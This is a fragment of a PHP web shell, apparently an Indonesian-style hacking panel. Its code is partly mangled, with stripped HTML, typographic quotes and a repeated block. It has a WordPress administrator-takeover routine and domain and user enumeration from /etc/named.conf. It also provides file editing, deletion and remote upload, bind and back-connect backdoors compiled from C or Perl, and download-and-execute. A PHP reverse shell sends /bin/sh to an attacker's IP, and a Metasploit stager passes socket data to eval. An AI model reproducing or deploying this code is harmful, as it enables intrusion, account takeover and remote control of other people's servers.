‘.$site_url.’ ‘.$user.’ ‘.$pass.’ login

‘;} else echo ‘

ERROR !

‘;} else die(‘

Not a wordpress config

‘);} else { ?>

WordPress login changer ( symlink version )

config link :
new user :
new password :

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘domains’)){echo ”

Domains and Users

“;$d0mains = @file(“/etc/named.conf”);if(!$d0mains){die(“

Error : i can’t read [ /etc/named.conf ]
“);}echo ”;foreach($d0mains as $d0main){if(eregi(“zone”,$d0main)){preg_match_all(‘#zone “(.*)”#’, $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner(“/etc/valiases/”.$domains[1][0]));echo “”;flush();}}}echo”;}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘keyboard’)){if(empty($_POST[‘pwd’])){echo ”

WordPress login changer

DB_Prefix :   host :   database :   username :   password :

New username :

New password :

“;}else{$prefix = $_POST[‘prefix’];$localhost = $_POST[‘localhost’];$database= $_POST[‘database’];$username= $_POST[‘username’];$password= $_POST[‘password’];$pwd= $_POST[‘pwd’];$admin= $_POST[‘admin’];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$hash = crypt($pwd);$grab = @mysql_query(“SELECT * from `”.$prefix.”options` WHERE option_name=’home'”);$data = @mysql_fetch_array($grab);$site_url=$data[“option_value”];$k2=@mysql_query(“UPDATE “.$prefix.”users SET user_login ='”.$admin.”‘ WHERE ID = 1″) or die(mysql_error());$k2=@mysql_query(“UPDATE “.$prefix.”users SET user_pass ='”.$hash.”‘ WHERE ID = 1″) or die(mysql_error());if($k2){echo ‘

Done … -> Login

‘;}}echo ”;}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘string’)){$text = $_POST[‘code’];?>

String encoder

 ‘.$codi.’

‘;}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘phpinfo’)){@ob_start();@eval(“phpinfo();”);$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,””)+6;$akhir = strpos($buff,””);echo ”

“.substr($buff,$awal,$akhir-$awal).”

“;}
elseif(isset($_GET[‘view’]) && ($_GET[‘view’] != “”)){if(is_file($_GET[‘view’])){if(!isset($file))$file = magicboom($_GET[‘view’]);if(!$win && $posix){$name=@posix_getpwuid(@fileowner($file));$group=@posix_getgrgid(@filegroup($file));$owner = $name[‘name’].” : “.$group[‘name’];} else {$owner = $user;}$filn = basename($file);echo ”

Domains users
“.$domains[1][0].” “.$user[‘name’].”
Filename “.$file.”
Size “.ukuran($file).”
Permission “.get_perms($file).”
Owner “.$owner.”
Create time “.date(“d-M-Y H:i”,@filectime($file)).”
Last modified “.date(“d-M-Y H:i”,@filemtime($file)).”
Last accessed “.date(“d-M-Y H:i”,@fileatime($file)).”
Actions edit | rename | delete | download (gzip)
View text | code | image

“;
if(isset($_GET[‘type’]) && ($_GET[‘type’]==’image’)){echo ”

“;}
elseif(isset($_GET[‘type’]) && ($_GET[‘type’]==’code’)){echo ”

“;$file = wordwrap(@file_get_contents($file),”240″,”\n”);@highlight_string($file);echo “

“;} else {echo ”

“;echo nl2br(htmlentities((@file_get_contents($file))));echo “

“;}}elseif(is_dir($_GET[‘view’])){echo showdir($pwd,$prompt);}}
elseif(isset($_GET[‘edit’]) && ($_GET[‘edit’] != “”)){if(isset($_POST[‘save’])){$file = $_POST[‘saveas’];$content = magicboom($_POST[‘content’]);if($filez = @fopen($file,”w”)){$time = date(“d-M-Y H:i”,time());if(@fwrite($filez,$content)) $msg = “file saved @ “.$time;else $msg = “failed to save”;@fclose($filez);}else $msg = “permission denied”;}if(!isset($file))$file = $_GET[‘edit’];if($filez = @fopen($file,”r”)){$content = “”;
while(!feof($filez)){$content .= htmlentities(str_replace(“””,”‘”,fgets($filez)));}
@fclose($filez);}?>

Save as  

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘upload’)){if(isset($_POST[‘uploadcomp’])){if(is_uploaded_file($_FILES[‘file’][‘tmp_name’])){$path = magicboom($_POST[‘path’]);$fname = $_FILES[‘file’][‘name’];$tmp_name = $_FILES[‘file’][‘tmp_name’];$pindah = $path.$fname;$stat = @move_uploaded_file($tmp_name,$pindah);if ($stat) {$msg = “file uploaded to $pindah”;} else $msg = “failed to upload $fname”;}else $msg = “failed to upload $fname”;}
elseif(isset($_POST[‘uploadurl’])){$pilihan = trim($_POST[‘pilihan’]);$wurl = trim($_POST[‘wurl’]);$path = magicboom($_POST[‘path’]);$namafile = download($pilihan,$wurl);$pindah = $path.$namafile;if(is_file($pindah)){$msg = “file uploaded to $pindah”;}else $msg =”failed to upload $namafile”;}?>

Upload Files To The Server

Local

 
Remote
link


elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘back’)){
if (isset($_POST[‘bind’]) && !empty($_POST[‘port’]) && !empty($_POST[‘bind_pass’]) && ($_POST[‘use’] == ‘C’)) {$port = trim($_POST[‘port’]);$passwrd = trim($_POST[‘bind_pass’]);tulis(“bdc.c”,$port_bind_bd_c);exe(“gcc -o bdc bdc.c”);exe(“chmod 777 bdc”);@unlink(“bdc.c”);exe(“./bdc “.$port.” “.$passwrd.” &”);$scan = exe(“ps aux”);if(eregi(“./bdc $por”,$scan)){$msg = “Process successed

“;} else {$msg = “Process Failed

“;}}
elseif (isset($_POST[‘bind’]) && !empty($_POST[‘port’]) && !empty($_POST[‘bind_pass’]) && ($_POST[‘use’] == ‘Perl’)) {$port = trim($_POST[‘port’]);$passwrd = trim($_POST[‘bind_pass’]);tulis(“bdp”,$port_bind_bd_pl);exe(“chmod 777 bdp”);$p2=which(“perl”);exe($p2.” bdp “.$port.” &”);$scan = exe(“ps aux”);if(eregi(“$p2 bdp $port”,$scan)){$msg = “Process successed

“;} else {$msg = “Process Failed

“;} }
elseif (isset($_POST[‘backconn’]) && !empty($_POST[‘backport’]) && !empty($_POST[‘ip’]) && ($_POST[‘use’] == ‘C’)) {$ip = trim($_POST[‘ip’]);$port = trim($_POST[‘backport’]);tulis(“bcc.c”,$back_connect_c);exe(“gcc -o bcc bcc.c”);exe(“chmod 777 bcc”);@unlink(“bcc.c”);exe(“./bcc “.$ip.” “.$port.” &”);$msg = “trying to connect to “.$ip.” on port “.$port.” …”;}
elseif (isset($_POST[‘backconn’]) && !empty($_POST[‘backport’]) && !empty($_POST[‘ip’]) && ($_POST[‘use’] == ‘Perl’)) {
$ip = trim($_POST[‘ip’]);$port = trim($_POST[‘backport’]);tulis(“bcp”,$back_connect);
exe(“chmod +x bcp”);$p2=which(“perl”);exe($p2.” bcp “.$ip.” “.$port.” &”);
$msg = “Trying to connect to “.$ip.” on port “.$port.” …”;}
elseif (isset($_POST[‘expcompile’]) && !empty($_POST[‘wurl’]) && !empty($_POST[‘wcmd’])) {$pilihan = trim($_POST[‘pilihan’]);$wurl = trim($_POST[‘wurl’]);$namafile = download($pilihan,$wurl);
if(is_file($namafile)){$msg = exe($wcmd);}
else $msg = “error: file not found $namafile”;}?>

Bind Port Back connect download and Exec
Port
Password
Use
IP “>
Port
Use
url
cmd

error_reporting(0);
function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}
$s_my_ip = $_SERVER[‘REMOTE_ADDR’];$rsport = “443”;$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = “

Reverse shell ( php )

Your IP
Port

Metasploit Connection

Your IP
Port

“;
echo $s_result;
if($_POST[‘metaConnect’]){$ipaddr = $_POST[‘yip’];$port = $_POST[‘yport’];if ($ip == “” && $port == “”){echo “fill in the blanks”;}else {if (FALSE !== strpos($ipaddr, “:”)) {$ipaddr = “[“. $ipaddr .”]”;}if (is_callable(‘stream_socket_client’)){$msgsock = stream_socket_client(“tcp://{$ipaddr}:{$port}”);if (!$msgsock){die();}$msgsock_type = ‘stream’;}elseif (is_callable(‘fsockopen’)){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = ‘stream’;}elseif (is_callable(‘socket_create’)){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = ‘socket’;}else {die();}switch ($msgsock_type){case ‘stream’: $len = fread($msgsock, 4); break;case ‘socket’: $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack(“Nlen”, $len);$len = $a[‘len’];$buffer = ”;while (strlen($buffer) < $len){switch ($msgsock_type) {case ‘stream’: $buffer .= fread($msgsock, $len-strlen($buffer)); break;case ‘socket’: $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo “[*] Connection Terminated”;die();}}
if(isset($_REQUEST[‘sqlportb4’])) $rsportb4 = ss($_REQUEST[‘sqlportb4’]);
if(isset($_REQUEST[‘rstarget4’])) $rstarget4 = ss($_REQUEST[‘rstarget4’]);
if ($_POST[‘xback_php’]) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = ‘/bin/sh’;$daemon = 0;$debug = 0;if(function_exists(‘pcntl_fork’)){$pid = pcntl_fork();
if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}
umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
$descriptorspec = array(0 => array(“pipe”, “r”), 1 => array(“pipe”, “w”), 2 => array(“pipe”, “w”));
$process = proc_open($shell, $descriptorspec, $pipes);
if(!is_resource($process)) exit(1);
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}
if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}
if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = ” “;$s_result .= $rsres;}} elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘shell’)){?>


elseif(isset($_GET[‘fdelete’]) && ($_GET[‘fdelete’] != “”)){@rmdir(rtrim($_GET[‘fdelete’],DIRECTORY_SEPARATOR));}
elseif(isset($_GET[‘mkdir’]) && ($_GET[‘mkdir’] != “”)){$path = $pwd.$_GET[‘mkdir’];@mkdir($path);}$buff = showdir($pwd,$prompt);echo $buff;}
?>

 

elseif(isset($_GET[‘fdelete’]) && ($_GET[‘fdelete’] != “”)){@rmdir(rtrim($_GET[‘fdelete’],DIRECTORY_SEPARATOR));}
elseif(isset($_GET[‘mkdir’]) && ($_GET[‘mkdir’] != “”)){$path = $pwd.$_GET[‘mkdir’];@mkdir($path);}$buff = showdir($pwd,$prompt);echo $buff;}
?></div></body></html>